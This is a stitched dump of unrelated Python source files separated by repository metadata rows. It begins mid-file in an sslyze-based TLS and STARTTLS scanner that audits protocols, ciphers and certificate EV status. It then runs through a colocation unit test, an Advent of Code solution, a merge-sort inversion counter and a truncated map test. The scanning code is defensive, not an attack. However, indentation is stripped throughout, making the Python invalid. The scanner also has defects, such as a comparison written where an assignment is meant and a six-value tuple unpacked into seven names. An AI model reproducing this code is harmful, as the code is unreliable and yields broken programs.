# connections made to them. In testing the various cyphers we
# make a lot of connections, and multiple government domains
# often use the same SMTP servers, so it makes sense to check
# if we have already hit this mail server when testing a
# different domain.
cached_value = None
if FAST_CACHE_KEY in environment:
cached_value = environment[FAST_CACHE_KEY].get(mail_server, None)
if cached_value is None:
logging.debug('Adding {} to list to be scanned'.format(mail_server))
hostname_and_port = mail_server.split(':')
hosts_to_scan.append({
'hostname': hostname_and_port[0],
'port': int(hostname_and_port[1]),
'starttls_smtp': True
})
else:
logging.debug('Using cached data for {}'.format(mail_server))
cached_data.append(cached_value)
if not hosts_to_scan:
logging.warning('\tNo hosts to scan for {}'.format(domain))
return {
'hosts_to_scan': hosts_to_scan,
'cached_data': cached_data
}
# Run sslyze on the given domain.
def scan(domain, environment, options):
# Allow hostnames to be adjusted by init_domain
default_host = {
'hostname': domain,
'port': 443,
'starttls_smtp': False
}
retVal = []
for host_to_scan in environment.get('hosts_to_scan', [default_host]):
data = {
'hostname': host_to_scan.get('hostname'),
'port': host_to_scan.get('port'),
'starttls_smtp': host_to_scan.get('starttls_smtp'),
'protocols': {},
'config': {},
'certs': {},
'errors': []
}
# Run the SSLyze scan on the given hostname.
response = run_sslyze(data, environment, options)
# Error condition.
if response is None:
error = "No valid target for scanning, couldn't connect."
logging.warning(error)
data['errors'].append(error)
# Join all errors into a string before returning.
data['errors'] = ' '.join(data['errors'])
retVal.append(data)
# Return the scan results together with the already-cached results
# (if there were any)
retVal.extend(environment['cached_data'])
return retVal
def post_scan(domain: str, data: Any, environment: dict, options: dict):
"""Post-scan hook for sslyze
Add SMTP results to the fast cache, keyed by the concatenation of
the mail server and port. Do not update if an appropriate cache
entry appeared while we were running, since the earlier entry is
more likely to be correct because it is less likely to have
triggered any defenses that are in place.
Parameters
----------
domain : str
The domain being scanned.
data : Any
The result returned by the scan function for the domain
currently being scanned.
environment: dict
The environment data structure associated with the scan that
produced the results in data.
options: dict
The CLI options.
"""
# Make sure fast caching hasn't been disabled
if not options['no_fast_cache'] and data is not None:
if FAST_CACHE_KEY not in environment:
environment[FAST_CACHE_KEY] = {}
fast_cache = environment[FAST_CACHE_KEY]
# Add the SMTP host results to the fast cache
for record in data:
if record['starttls_smtp']:
key = '{}:{}'.format(record['hostname'],
record['port'])
# Avoid overwriting the cached data if someone
# else wrote it while we were running
if key not in fast_cache:
fast_cache[key] = record
# Given a response dict, turn it into CSV rows.
def to_rows(data):
retVal = []
for row in data:
ev = row.get('certs', {}).get('ev', {})
retVal.append([
row['hostname'],
row['port'],
row['starttls_smtp'],
row['protocols'].get('sslv2'), row['protocols'].get('sslv3'),
row['protocols'].get('tlsv1.0'), row['protocols'].get('tlsv1.1'),
row['protocols'].get('tlsv1.2'), row['protocols'].get('tlsv1.3'),
row['config'].get('any_dhe'), row['config'].get('all_dhe'),
row['config'].get('any_rc4'), row['config'].get('all_rc4'),
row['config'].get('any_3des'),
row['certs'].get('key_type'), row['certs'].get('key_length'),
row['certs'].get('leaf_signature'),
row['certs'].get('any_sha1_served'),
row['certs'].get('any_sha1_constructed'),
row['certs'].get('not_before'), row['certs'].get('not_after'),
row['certs'].get('served_issuer'), row['certs'].get('constructed_issuer'),
ev.get('asserted'), ev.get('trusted'),
str.join(", ", ev.get('trusted_oids', [])),
str.join(", ", ev.get('trusted_browsers', [])),
row['certs'].get('is_symantec_cert'),
row['certs'].get('symantec_distrust_date'),
str.join(', ', row.get('ciphers', [])),
row.get('errors')
])
return retVal
headers = [
"Scanned Hostname",
"Scanned Port",
"STARTTLS SMTP",
"SSLv2", "SSLv3", "TLSv1.0", "TLSv1.1", "TLSv1.2", "TLSv1.3",
"Any Forward Secrecy", "All Forward Secrecy",
"Any RC4", "All RC4",
"Any 3DES",
"Key Type", "Key Length",
"Signature Algorithm",
"SHA-1 in Served Chain",
"SHA-1 in Constructed Chain",
"Not Before", "Not After",
"Highest Served Issuer", "Highest Constructed Issuer",
"Asserts EV", "Trusted for EV",
"EV Trusted OIDs", "EV Trusted Browsers",
"Is Symantec Cert", "Symantec Distrust Date",
"Accepted Ciphers",
"Errors"
]
# Get the relevant fields out of sslyze's JSON format.
#
# Certificate PEM data must be separately parsed using
# the Python cryptography module.
def run_sslyze(data, environment, options):
# Each sslyze worker can use a sync or parallel mode.
#
# SynchronousScanner can show memory leaks when parsing certs,
# so local scanning defaults to using ConcurrentScanner.
#
# And Lambda can't use multiprocessing.Queue, so in the cloud,
# this default cannot be overridden.
scan_method = environment.get("scan_method", "local")
if scan_method == "lambda":
sync = True
else:
sync = options.get("sslyze_serial", True)
# Initialize either a synchronous or concurrent scanner.
server_info, scanner = init_sslyze(data['hostname'], data['port'], data['starttls_smtp'], options, sync=sync)
if server_info is None:
data['errors'].append("Connectivity not established.")
return data
# Whether sync or concurrent, get responses for all scans.
if sync:
sslv2, sslv3, tlsv1, tlsv1_1, tlsv1_2, tlsv1_3, certs = scan_serial(scanner, server_info, data, options)
else:
sslv2, sslv3, tlsv1, tlsv1_1, tlsv1_2, tlsv1_3, certs = scan_parallel(scanner, server_info, data, options)
# Only analyze protocols if all the scanners functioned.
# Very difficult to draw conclusions if some worked and some did not.
if sslv2 and sslv3 and tlsv1 and tlsv1_1 and tlsv1_2 and tlsv1_3:
analyze_protocols_and_ciphers(data, sslv2, sslv3, tlsv1, tlsv1_1, tlsv1_2, tlsv1_3)
if certs:
data['certs'] = analyze_certs(certs)
return data
def analyze_protocols_and_ciphers(data, sslv2, sslv3, tlsv1, tlsv1_1, tlsv1_2, tlsv1_3):
data['protocols'] = {
'sslv2': supported_protocol(sslv2),
'sslv3': supported_protocol(sslv3),
'tlsv1.0': supported_protocol(tlsv1),
'tlsv1.1': supported_protocol(tlsv1_1),
'tlsv1.2': supported_protocol(tlsv1_2),
'tlsv1.3': supported_protocol(tlsv1_3)
}
accepted_ciphers = (
(sslv2.accepted_cipher_list or []) +
(sslv3.accepted_cipher_list or []) +
(tlsv1.accepted_cipher_list or []) +
(tlsv1_1.accepted_cipher_list or []) +
(tlsv1_2.accepted_cipher_list or []) +
(tlsv1_3.accepted_cipher_list or [])
)
data['ciphers'] = [cipher.name for cipher in accepted_ciphers]
if len(accepted_ciphers) > 0:
# Look at accepted cipher suites for RC4 or DHE.
# This is imperfect, as the advertising of RC4 could discriminate based on client.
# DHE and ECDHE may not remain the only forward secret options for TLS.
any_rc4 = False
any_dhe = False
all_rc4 = True
all_dhe = True
any_3des = False
for cipher in accepted_ciphers:
name = cipher.openssl_name
if "RC4" in name:
any_rc4 = True
else:
all_rc4 = False
if ("3DES" in name) or ("DES-CBC3" in name):
any_3des = True
if name.startswith("DHE-") or name.startswith("ECDHE-"):
any_dhe = True
else:
all_dhe = False
data['config']['any_rc4'] = any_rc4
data['config']['all_rc4'] = all_rc4
data['config']['any_dhe'] = any_dhe
data['config']['all_dhe'] = all_dhe
data['config']['any_3des'] = any_3des
def analyze_certs(certs):
data = {'certs': {}}
# Served chain.
served_chain = certs.certificate_chain
# Constructed chain may not be there if it didn't validate.
constructed_chain = certs.verified_certificate_chain
highest_served = parse_cert(served_chain[-1])
issuer = cert_issuer_name(highest_served)
if issuer:
data['certs']['served_issuer'] = issuer
else:
data['certs']['served_issuer'] = "(None found)"
if (constructed_chain and (len(constructed_chain) > 0)):
highest_constructed = parse_cert(constructed_chain[-1])
issuer = cert_issuer_name(highest_constructed)
if issuer:
data['certs']['constructed_issuer'] = issuer
else:
data['certs']['constructed_issuer'] = "(None constructed)"
leaf = parse_cert(served_chain[0])
leaf_key = leaf.public_key()
if hasattr(leaf_key, "key_size"):
data['certs']['key_length'] = leaf_key.key_size
elif hasattr(leaf_key, "curve"):
data['certs']['key_length'] = leaf_key.curve.key_size
else:
data['certs']['key_length'] = None
if isinstance(leaf_key, rsa.RSAPublicKey):
leaf_key_type = "RSA"
elif isinstance(leaf_key, dsa.DSAPublicKey):
leaf_key_type = "DSA"
elif isinstance(leaf_key, ec.EllipticCurvePublicKey):
leaf_key_type = "ECDSA"
else:
leaf_key_type == str(leaf_key.__class__)
data['certs']['key_type'] = leaf_key_type
# Signature of the leaf certificate only.
data['certs']['leaf_signature'] = leaf.signature_hash_algorithm.name
# Beginning and expiration dates of the leaf certificate
data['certs']['not_before'] = leaf.not_valid_before
data['certs']['not_after'] = leaf.not_valid_after
any_sha1_served = False
for cert in served_chain:
if parse_cert(cert).signature_hash_algorithm.name == "sha1":
any_sha1_served = True
data['certs']['any_sha1_served'] = any_sha1_served
if data['certs'].get('constructed_issuer'):
data['certs']['any_sha1_constructed'] = certs.has_sha1_in_certificate_chain
extensions = leaf.extensions
oids = []
try:
ext = extensions.get_extension_for_class(cryptography.x509.extensions.CertificatePolicies)
policies = ext.value
for policy in policies:
oids.append(policy.policy_identifier.dotted_string)
except cryptography.x509.ExtensionNotFound:
# If not found, just move on.
pass
data['certs']['ev'] = {
'asserted': False,
'trusted': False,
'trusted_oids': [],
'trusted_browsers': []
}
for oid in oids:
# If it matches the generic EV OID, the certifciate is
# asserting that it was issued following the EV guidelines.
data['certs']['ev']['asserted'] = (oid == evg_oid)
# Check which browsers for which the cert is marked as EV.
browsers = []
if oid in mozilla_ev:
browsers.append("Mozilla")
if oid in google_ev:
browsers.append("Google")
if oid in microsoft_ev:
browsers.append("Microsoft")
if oid in apple_ev:
browsers.append("Apple")
if len(browsers) > 0:
data['certs']['ev']['trusted'] = True
# Log each new OID we observe as marked for EV.
if oid not in data['certs']['ev']['trusted_oids']:
data['certs']['ev']['trusted_oids'].append(oid)
# For all matching browsers, log each new one.
for browser in browsers:
if browser not in data['certs']['ev']['trusted_browsers']:
data['certs']['ev']['trusted_browsers'].append(browser)
# Is this cert issued by Symantec?
distrust_timeline = certs.symantec_distrust_timeline
is_symantec_cert = (distrust_timeline is not None)
data['certs']['is_symantec_cert'] = is_symantec_cert
if is_symantec_cert:
data['certs']['symantec_distrust_date'] = distrust_timeline.name
else:
data['certs']['symantec_distrust_date'] = None
return data['certs']
# Given the cert sub-obj from the sslyze JSON, use
# the cryptography module to parse its PEM contents.
def parse_cert(cert):
backend = cryptography.hazmat.backends.openssl.backend
pem_bytes = cert.public_bytes(Encoding.PEM).decode('ascii').encode('utf-8')
return cryptography.x509.load_pem_x509_certificate(pem_bytes, backend)
# Given a parsed cert from the cryptography module,
# get the issuer name as best as possible
def cert_issuer_name(parsed):
attrs = parsed.issuer.get_attributes_for_oid(cryptography.x509.oid.NameOID.COMMON_NAME)
if len(attrs) == 0:
attrs = parsed.issuer.get_attributes_for_oid(cryptography.x509.oid.NameOID.ORGANIZATIONAL_UNIT_NAME)
if len(attrs) == 0:
return None
return attrs[0].value
# Given CipherSuiteScanResult, whether the protocol is supported
def supported_protocol(result):
return (len(result.accepted_cipher_list) > 0)
# SSlyze initialization boilerplate
def init_sslyze(hostname, port, starttls_smtp, options, sync=False):
global network_timeout
network_timeout = int(options.get("network_timeout", network_timeout))
tls_wrapped_protocol = TlsWrappedProtocolEnum.PLAIN_TLS
if starttls_smtp:
tls_wrapped_protocol = TlsWrappedProtocolEnum.STARTTLS_SMTP
try:
# logging.debug("\tTesting connectivity with timeout of %is." % network_timeout)
server_tester = ServerConnectivityTester(hostname=hostname, port=port, tls_wrapped_protocol=tls_wrapped_protocol)
server_info = server_tester.perform(network_timeout=network_timeout)
except ServerConnectivityError:
logging.warning("\tServer connectivity not established during test.")
return None, None
except Exception as err:
utils.notify(err)
logging.warning("\tUnknown exception when performing server connectivity info.")
return None, None
if sync:
scanner = SynchronousScanner(network_timeout=network_timeout)
else:
scanner = ConcurrentScanner(network_timeout=network_timeout)
return server_info, scanner
# Run each scan in-process, one at a time.
# Takes longer, but no multi-process funny business.
def scan_serial(scanner, server_info, data, options):
logging.debug("\tRunning scans in serial.")
logging.debug("\t\tSSLv2 scan.")
sslv2 = scanner.run_scan_command(server_info, Sslv20ScanCommand())
logging.debug("\t\tSSLv3 scan.")
sslv3 = scanner.run_scan_command(server_info, Sslv30ScanCommand())
logging.debug("\t\tTLSv1.0 scan.")
tlsv1 = scanner.run_scan_command(server_info, Tlsv10ScanCommand())
logging.debug("\t\tTLSv1.1 scan.")
tlsv1_1 = scanner.run_scan_command(server_info, Tlsv11ScanCommand())
logging.debug("\t\tTLSv1.2 scan.")
tlsv1_2 = scanner.run_scan_command(server_info, Tlsv12ScanCommand())
logging.debug("\t\tTLSv1.3 scan.")
tlsv1_3 = scanner.run_scan_command(server_info, Tlsv13ScanCommand())
certs = None
if options.get("sslyze_certs", True) is True:
try:
logging.debug("\t\tCertificate information scan.")
certs = scanner.run_scan_command(server_info, CertificateInfoScanCommand())
# Let generic exceptions bubble up.
except idna.core.InvalidCodepoint:
logging.warning(utils.format_last_exception())
data['errors'].append("Invalid certificate/OCSP for this domain.")
certs = None
else:
certs = None
logging.debug("\tDone scanning.")
return sslv2, sslv3, tlsv1, tlsv1_1, tlsv1_2, tlsv1_3, certs
# Run each scan in parallel, using multi-processing.
# Faster, but can generate many processes.
def scan_parallel(scanner, server_info, data, options):
logging.debug("\tRunning scans in parallel.")
def queue(command):
try:
return scanner.queue_scan_command(server_info, command)
except OSError:
text = ("OSError - likely too many processes and open files.")
data['errors'].append(text)
logging.warning("%s\n%s" % (text, utils.format_last_exception()))
return None, None, None, None, None, None, None
except Exception:
text = ("Unknown exception queueing sslyze command.\n%s" % utils.format_last_exception())
data['errors'].append(text)
logging.warning(text)
return None, None, None, None, None, None, None
# Initialize commands and result containers
sslv2, sslv3, tlsv1, tlsv1_1, tlsv1_2, tlsv1_3, certs = None, None, None, None, None, None
# Queue them all up
queue(Sslv20ScanCommand())
queue(Sslv30ScanCommand())
queue(Tlsv10ScanCommand())
queue(Tlsv11ScanCommand())
queue(Tlsv12ScanCommand())
queue(Tlsv13ScanCommand())
if options.get("sslyze-certs", True) is True:
queue(CertificateInfoScanCommand())
# Reassign them back to predictable places after they're all done
was_error = False
for result in scanner.get_results():
try:
if isinstance(result, PluginRaisedExceptionScanResult):
error = ("Scan command failed: %s" % result.as_text())
logging.warning(error)
data['errors'].append(error)
return None, None, None, None, None, None, None
if type(result.scan_command) == Sslv20ScanCommand:
sslv2 = result
elif type(result.scan_command) == Sslv30ScanCommand:
sslv3 = result
elif type(result.scan_command) == Tlsv10ScanCommand:
tlsv1 = result
elif type(result.scan_command) == Tlsv11ScanCommand:
tlsv1_1 = result
elif type(result.scan_command) == Tlsv12ScanCommand:
tlsv1_2 = result
elif type(result.scan_command) == Tlsv13ScanCommand:
tlsv1_3 = result
elif type(result.scan_command) == CertificateInfoScanCommand:
certs = result
else:
error = "Couldn't match scan result with command! %s" % result
logging.warning("\t%s" % error)
data['errors'].append(error)
was_error = True
except Exception:
was_error = True
text = ("Exception inside async scanner result processing.\n%s" % utils.format_last_exception())
data['errors'].append(text)
logging.warning("\t%s" % text)
# There was an error during async processing.
if was_error:
return None, None, None, None, None, None, None
logging.debug("\tDone scanning.")
return sslv2, sslv3, tlsv1, tlsv1_1, tlsv1_2, tlsv1_3, certs
# EV Guidelines OID
evg_oid = "2.23.140.1.1"
# Google source:
# https://cs.chromium.org/chromium/src/net/cert/ev_root_ca_metadata.cc?sq=package:chromium&dr=C
google_ev = [
"1.2.392.200091.100.721.1",
"1.2.616.1.113527.2.5.1.1",
"1.3.159.1.17.1",
"1.3.171.1.1.10.5.2",
"1.3.6.1.4.1.13177.10.1.3.10",
"1.3.6.1.4.1.14370.1.6",
"1.3.6.1.4.1.14777.6.1.1",
"1.3.6.1.4.1.14777.6.1.2",
"1.3.6.1.4.1.17326.10.14.2.1.2",
"1.3.6.1.4.1.17326.10.14.2.2.2",
"1.3.6.1.4.1.17326.10.8.12.1.2",
"1.3.6.1.4.1.17326.10.8.12.2.2",
"1.3.6.1.4.1.22234.2.5.2.3.1",
"1.3.6.1.4.1.23223.1.1.1",
"1.3.6.1.4.1.29836.1.10",
"1.3.6.1.4.1.34697.2.1",
"1.3.6.1.4.1.34697.2.2",
"1.3.6.1.4.1.34697.2.3",
"1.3.6.1.4.1.34697.2.4",
"1.3.6.1.4.1.40869.1.1.22.3",
"1.3.6.1.4.1.4146.1.1",
"1.3.6.1.4.1.4788.2.202.1",
"1.3.6.1.4.1.6334.1.100.1",
"1.3.6.1.4.1.6449.1.2.1.5.1",
"1.3.6.1.4.1.782.1.2.1.8.1",
"1.3.6.1.4.1.7879.13.24.1",
"1.3.6.1.4.1.8024.0.2.100.1.2",
"2.16.156.112554.3",
"2.16.528.1.1003.1.2.7",
"2.16.578.1.26.1.3.3",
"2.16.756.1.83.21.0",
"2.16.756.1.89.1.2.1.1",
"2.16.756.5.14.7.4.8",
"2.16.792.3.0.4.1.1.4",
"2.16.840.1.113733.1.7.23.6",
"2.16.840.1.113733.1.7.48.1",
"2.16.840.1.114028.10.1.2",
"2.16.840.1.114171.500.9",
"2.16.840.1.114404.1.1.2.4.1",
"2.16.840.1.114412.2.1",
"2.16.840.1.114413.1.7.23.3",
"2.16.840.1.114414.1.7.23.3",
"2.16.840.1.114414.1.7.24.3"
]
# Mozilla source:
# https://dxr.mozilla.org/mozilla-central/source/security/certverifier/ExtendedValidation.cpp
mozilla_ev = [
"1.2.156.112559.1.1.6.1",
"1.2.392.200091.100.721.1",
"1.2.616.1.113527.2.5.1.1",
"1.3.159.1.17.1",
"1.3.171.1.1.10.5.2",
"1.3.6.1.4.1.13177.10.1.3.10",
"1.3.6.1.4.1.14370.1.6",
"1.3.6.1.4.1.14777.6.1.1",
"1.3.6.1.4.1.14777.6.1.2",
"1.3.6.1.4.1.17326.10.14.2.1.2",
"1.3.6.1.4.1.17326.10.8.12.1.2",
"1.3.6.1.4.1.22234.2.14.3.11",
"1.3.6.1.4.1.22234.2.5.2.3.1",
"1.3.6.1.4.1.22234.3.5.3.1",
"1.3.6.1.4.1.22234.3.5.3.2",
"1.3.6.1.4.1.34697.2.1",
"1.3.6.1.4.1.34697.2.2",
"1.3.6.1.4.1.34697.2.3",
"1.3.6.1.4.1.34697.2.4",
"1.3.6.1.4.1.40869.1.1.22.3",
"1.3.6.1.4.1.4146.1.1",
"1.3.6.1.4.1.4788.2.202.1",
"1.3.6.1.4.1.6334.1.100.1",
"1.3.6.1.4.1.6449.1.2.1.5.1",
"1.3.6.1.4.1.782.1.2.1.8.1",
"1.3.6.1.4.1.7879.13.24.1",
"1.3.6.1.4.1.8024.0.2.100.1.2",
"2.16.156.112554.3",
"2.16.528.1.1003.1.2.7",
"2.16.578.1.26.1.3.3",
"2.16.756.1.89.1.2.1.1",
"2.16.756.5.14.7.4.8",
"2.16.792.3.0.4.1.1.4",
"2.16.840.1.113733.1.7.23.6",
"2.16.840.1.113733.1.7.48.1",
"2.16.840.1.114028.10.1.2",
"2.16.840.1.114404.1.1.2.4.1",
"2.16.840.1.114412.2.1",
"2.16.840.1.114413.1.7.23.3",
"2.16.840.1.114414.1.7.23.3"
]
# Microsoft source:
# https://github.com/PeculiarVentures/tl-create
# Filtered to --microsoft with --for of SERVER_AUTH.
microsoft_ev = [
"0.4.0.2042.1.4",
"0.4.0.2042.1.5",
"1.2.156.112559.1.1.6.1",
"1.2.156.112559.1.1.7.1",
"1.2.156.112570.1.1.3",
"1.2.392.200091.100.721.1",
"1.2.40.0.17.1.22",
"1.2.616.1.113527.2.5.1.1",
"1.2.616.1.113527.2.5.1.7",
"1.3.159.1.17.1",
"1.3.171.1.1.1.10.5",
"1.3.171.1.1.10.5.2",
"1.3.6.1.4.1.13177.10.1.3.10",
"1.3.6.1.4.1.14370.1.6",
"1.3.6.1.4.1.14777.6.1.1",
"1.3.6.1.4.1.14777.6.1.2",
"1.3.6.1.4.1.15096.1.3.1.51.2",
"1.3.6.1.4.1.15096.1.3.1.51.4",
"1.3.6.1.4.1.17326.10.14.2.1.2",
"1.3.6.1.4.1.17326.10.16.3.6.1.3.2.1",
"1.3.6.1.4.1.17326.10.16.3.6.1.3.2.2",
"1.3.6.1.4.1.17326.10.8.12.1.1",
"1.3.6.1.4.1.17326.10.8.12.1.2",
"1.3.6.1.4.1.18332.55.1.1.2.12",
"1.3.6.1.4.1.18332.55.1.1.2.22",
"1.3.6.1.4.1.22234.2.14.3.11",
"1.3.6.1.4.1.22234.2.5.2.3.1",
"1.3.6.1.4.1.22234.3.5.3.1",
"1.3.6.1.4.1.22234.3.5.3.2",
"1.3.6.1.4.1.23223.1.1.1",
"1.3.6.1.4.1.29836.1.10",
"1.3.6.1.4.1.311.94.1.1",
"1.3.6.1.4.1.34697.2.1",
"1.3.6.1.4.1.34697.2.2",
"1.3.6.1.4.1.34697.2.3",
"1.3.6.1.4.1.34697.2.4",
"1.3.6.1.4.1.36305.2",
"1.3.6.1.4.1.38064.1.1.1.0",
"1.3.6.1.4.1.40869.1.1.22.3",
"1.3.6.1.4.1.4146.1.1",
"1.3.6.1.4.1.4146.1.2",
"1.3.6.1.4.1.4788.2.202.1",
"1.3.6.1.4.1.6334.1.100.1",
"1.3.6.1.4.1.6449.1.2.1.5.1",
"1.3.6.1.4.1.782.1.2.1.8.1",
"1.3.6.1.4.1.7879.13.24.1",
"1.3.6.1.4.1.8024.0.2.100.1.2",
"2.16.156.112554.3",
"2.16.528.1.1003.1.2.7",
"2.16.578.1.26.1.3.3",
"2.16.756.1.17.3.22.32",
"2.16.756.1.17.3.22.34",
"2.16.756.1.83.21.0",
"2.16.756.1.89.1.2.1.1",
"2.16.792.3.0.4.1.1.4",
"2.16.840.1.113733.1.7.23.6",
"2.16.840.1.113733.1.7.48.1",
"2.16.840.1.113839.0.6.9",
"2.16.840.1.114028.10.1.2",
"2.16.840.1.114404.1.1.2.4.1",
"2.16.840.1.114412.2.1",
"2.16.840.1.114413.1.7.23.3",
"2.16.840.1.114414.1.7.23.3",
"2.16.840.1.114414.1.7.24.2",
"2.16.840.1.114414.1.7.24.3"
]
# Apple source:
# https://github.com/PeculiarVentures/tl-create
# Filtered to --apple with a --for of SERVER_AUTH.
apple_ev = [
"1.2.250.1.177.1.18.2.2",
"1.2.392.200091.100.721.1",
"1.2.616.1.113527.2.5.1.1",
"1.3.159.1.17.1",
"1.3.6.1.4.1.13177.10.1.3.10",
"1.3.6.1.4.1.14370.1.6",
"1.3.6.1.4.1.14777.6.1.1",
"1.3.6.1.4.1.14777.6.1.2",
"1.3.6.1.4.1.17326.10.14.2.1.2",
"1.3.6.1.4.1.17326.10.8.12.1.2",
"1.3.6.1.4.1.18332.55.1.1.2.22",
"1.3.6.1.4.1.22234.2.14.3.11",
"1.3.6.1.4.1.22234.2.5.2.3.1",
"1.3.6.1.4.1.22234.3.5.3.1",
"1.3.6.1.4.1.23223.1.1.1",
"1.3.6.1.4.1.23223.2",
"1.3.6.1.4.1.34697.2.1",
"1.3.6.1.4.1.34697.2.2",
"1.3.6.1.4.1.34697.2.3",
"1.3.6.1.4.1.34697.2.4",
"1.3.6.1.4.1.40869.1.1.22.3",
"1.3.6.1.4.1.4146.1.1",
"1.3.6.1.4.1.4788.2.202.1",
"1.3.6.1.4.1.6334.1.100.1",
"1.3.6.1.4.1.6449.1.2.1.5.1",
"1.3.6.1.4.1.782.1.2.1.8.1",
"1.3.6.1.4.1.7879.13.24.1",
"1.3.6.1.4.1.8024.0.2.100.1.2",
"2.16.156.112554.3",
"2.16.528.1.1003.1.2.7",
"2.16.578.1.26.1.3.3",
"2.16.756.1.83.21.0",
"2.16.756.1.89.1.2.1.1",
"2.16.756.5.14.7.4.8",
"2.16.792.3.0.4.1.1.4",
"2.16.840.1.113733.1.7.23.6",
"2.16.840.1.113733.1.7.48.1",
"2.16.840.1.114028.10.1.2",
"2.16.840.1.114404.1.1.2.4.1",
"2.16.840.1.114412.1.3.0.2",
"2.16.840.1.114412.2.1",
"2.16.840.1.114413.1.7.23.3",
"2.16.840.1.114414.1.7.23.3",
"2.16.840.1.114414.1.7.24.3"
]
| 34.399541 | 168 | 0.614078 |
a616edbc6cebd82c266401bbcc52ed0148fe6993 | 851 | py | Python | test_colocation.py | joshzyj/pull_facebook_data_for_good | 082170b1ab3e9be26e5b8b706552e3cd8c324071 | [
"MIT"
] | null | null | null | test_colocation.py | joshzyj/pull_facebook_data_for_good | 082170b1ab3e9be26e5b8b706552e3cd8c324071 | [
"MIT"
] | null | null | null | test_colocation.py | joshzyj/pull_facebook_data_for_good | 082170b1ab3e9be26e5b8b706552e3cd8c324071 | [
"MIT"
] | 1 | 2020-04-30T20:43:13.000Z | 2020-04-30T20:43:13.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 5 11:11:56 2020
@author: hamishgibbs
"""
import unittest
import datetime
from colocation import get_file_dates, combine_url, get_urls
class TestColocation(unittest.TestCase):
def setUp(self):
self.date1 = datetime.datetime(2020, 1, 1, 8)
def test_get_file_dates(self):
self.assertIsInstance(get_file_dates(self.date1), list)
self.assertIsInstance(get_file_dates(self.date1)[0], datetime.datetime)
def test_combine_url(self):
self.assertIsInstance(combine_url(self.date1, 'url'), str)
def test_get_urls(self):
self.assertIsInstance(get_urls('url', get_file_dates(self.date1)), list)
self.assertIsInstance(get_urls('url', get_file_dates(self.date1))[0], str) | 26.59375 | 82 | 0.666275 |
648604bfa64bd5361db430909ba246a496fe2393 | 1,203 | py | Python | 2017/python/day2.py | majormunky/advent_of_code | 4cccd7f3879e28e465bbc39176659bdd52bd70d6 | [
"MIT"
] | null | null | null | 2017/python/day2.py | majormunky/advent_of_code | 4cccd7f3879e28e465bbc39176659bdd52bd70d6 | [
"MIT"
] | null | null | null | 2017/python/day2.py | majormunky/advent_of_code | 4cccd7f3879e28e465bbc39176659bdd52bd70d6 | [
"MIT"
] | 1 | 2020-12-04T06:12:01.000Z | 2020-12-04T06:12:01.000Z | import sys
import common
def get_filename():
filename = sys.argv[0]
filename = filename.split("/")[-1]
filename = filename.split(".")[0]
return filename
data = common.get_file_contents("data/{}_input.txt".format(get_filename()))
def get_parts(line):
result = []
for item in line.split(" "):
if len(item) > 0:
result.append(int(item))
return result
def part1():
answer = 0
for line in data:
line_parts = get_parts(line)
min_num = min(*line_parts)
max_num = max(*line_parts)
diff = max_num - min_num
answer += diff
return answer
def part2():
answer = 0
for line in data:
line_answer = 0
line_parts = get_parts(line)
for i in line_parts:
for j in line_parts:
if i == j:
continue
if int(i) % int(j) == 0:
line_answer = int(int(i) / int(j))
answer += line_answer
return answer
def main():
part1_answer = part1()
part2_answer = part2()
print(f"Part 1: {part1_answer}")
print(f"Part 2: {part2_answer}")
if __name__ == '__main__':
main()
| 19.721311 | 75 | 0.546966 |
ce0f870c092ccb68b4ed103d1a0693feed1a1db7 | 1,230 | py | Python | Algorithms/other/counting_inversions.py | philipandreadis/Algorithms-Collection-Python | 5109ccaf3ec09031d7e1f135e3492d8180026b43 | [
"MIT"
] | 86 | 2020-09-23T15:46:12.000Z | 2022-03-20T16:35:52.000Z | Algorithms/other/counting_inversions.py | dineshssdn-867/Algorithms-Collection-Python | 266e5608b0c3558c3738ab749e27329010cd9fd6 | [
"MIT"
] | 3 | 2020-03-29T14:32:00.000Z | 2020-08-27T21:50:28.000Z | Algorithms/other/counting_inversions.py | dineshssdn-867/Algorithms-Collection-Python | 266e5608b0c3558c3738ab749e27329010cd9fd6 | [
"MIT"
] | 40 | 2020-09-22T18:57:57.000Z | 2022-03-30T20:04:15.000Z | def merge_sort(array):
total_inversions = 0
if len(array) <= 1:
return (array, 0)
midpoint = int(len(array) / 2)
(left, left_inversions) = merge_sort(array[:midpoint])
(right, right_inversions) = merge_sort(array[midpoint:])
(merged_array, merge_inversions) = merge_and_count(left, right)
return (merged_array, left_inversions + right_inversions + merge_inversions)
def merge_and_count(left, right):
count_inversions = 0
result = []
left_pointer = right_pointer = 0
left_len = len(left)
right_len = len(right)
while left_pointer < len(left) and right_pointer < len(right):
if left[left_pointer] <= right[right_pointer]:
result.append(left[left_pointer])
left_pointer += 1
elif right[right_pointer] < left[left_pointer]:
count_inversions += left_len - left_pointer
result.append(right[right_pointer])
right_pointer += 1
result.extend(left[left_pointer:])
result.extend(right[right_pointer:])
return (result, count_inversions)
if __name__ == "__main__":
array = [9, 2, 1, 5, 2, 3, 5, 1, 2, 32, 12, 11]
print(array)
result = merge_sort(array)
print(result)
| 27.954545 | 80 | 0.64878 |
16a1caa494883f4f59810c7b3ade41902ec5da96 | 1,413 | py | Python | test_paralleldomain/model/map/test_map.py | parallel-domain/pd-sdk | 20e3d052a5cb612a2dd84bda7b1b5487a6a60edc | [
"Apache-2.0"
] | 10 | 2021-11-17T17:23:49.000Z | 2022-03-18T09:51:23.000Z | test_paralleldomain/model/map/test_map.py | parallel-domain/pd-sdk | 20e3d052a5cb612a2dd84bda7b1b5487a6a60edc | [
"Apache-2.0"
] | 3 | 2021-12-02T17:16:20.000Z | 2022-01-07T12:47:13.000Z | test_paralleldomain/model/map/test_map.py | parallel-domain/pd-sdk | 20e3d052a5cb612a2dd84bda7b1b5487a6a60edc | [
"Apache-2.0"
] | 2 | 2022-03-09T07:03:54.000Z | 2022-03-23T15:53:48.000Z | import os
import pytest
from paralleldomain.decoding.helper import decode_dataset
from paralleldomain.utilities.any_path import AnyPath
from test_paralleldomain.decoding.constants import DGP_V1_DATASET_PATH_ENV, UMD_FILE_PATH_ENV
@pytest.fixture
def umd_path() -> str:
if UMD_FILE_PATH_ENV not in os.environ:
pytest.skip()
return os.environ[UMD_FILE_PATH_ENV]
@pytest.fixture
def umd_dataset_path() -> str:
if DGP_V1_DATASET_PATH_ENV not in os.environ:
pytest.skip()
return os.environ[DGP_V1_DATASET_PATH_ENV]
def test_load_map(umd_path: str, umd_dataset_path: str):
dataset = decode_dataset(
dataset_path=umd_dataset_path,
dataset_format="dgpv1",
umd_file_paths={"scene_000000": AnyPath(umd_path)},
)
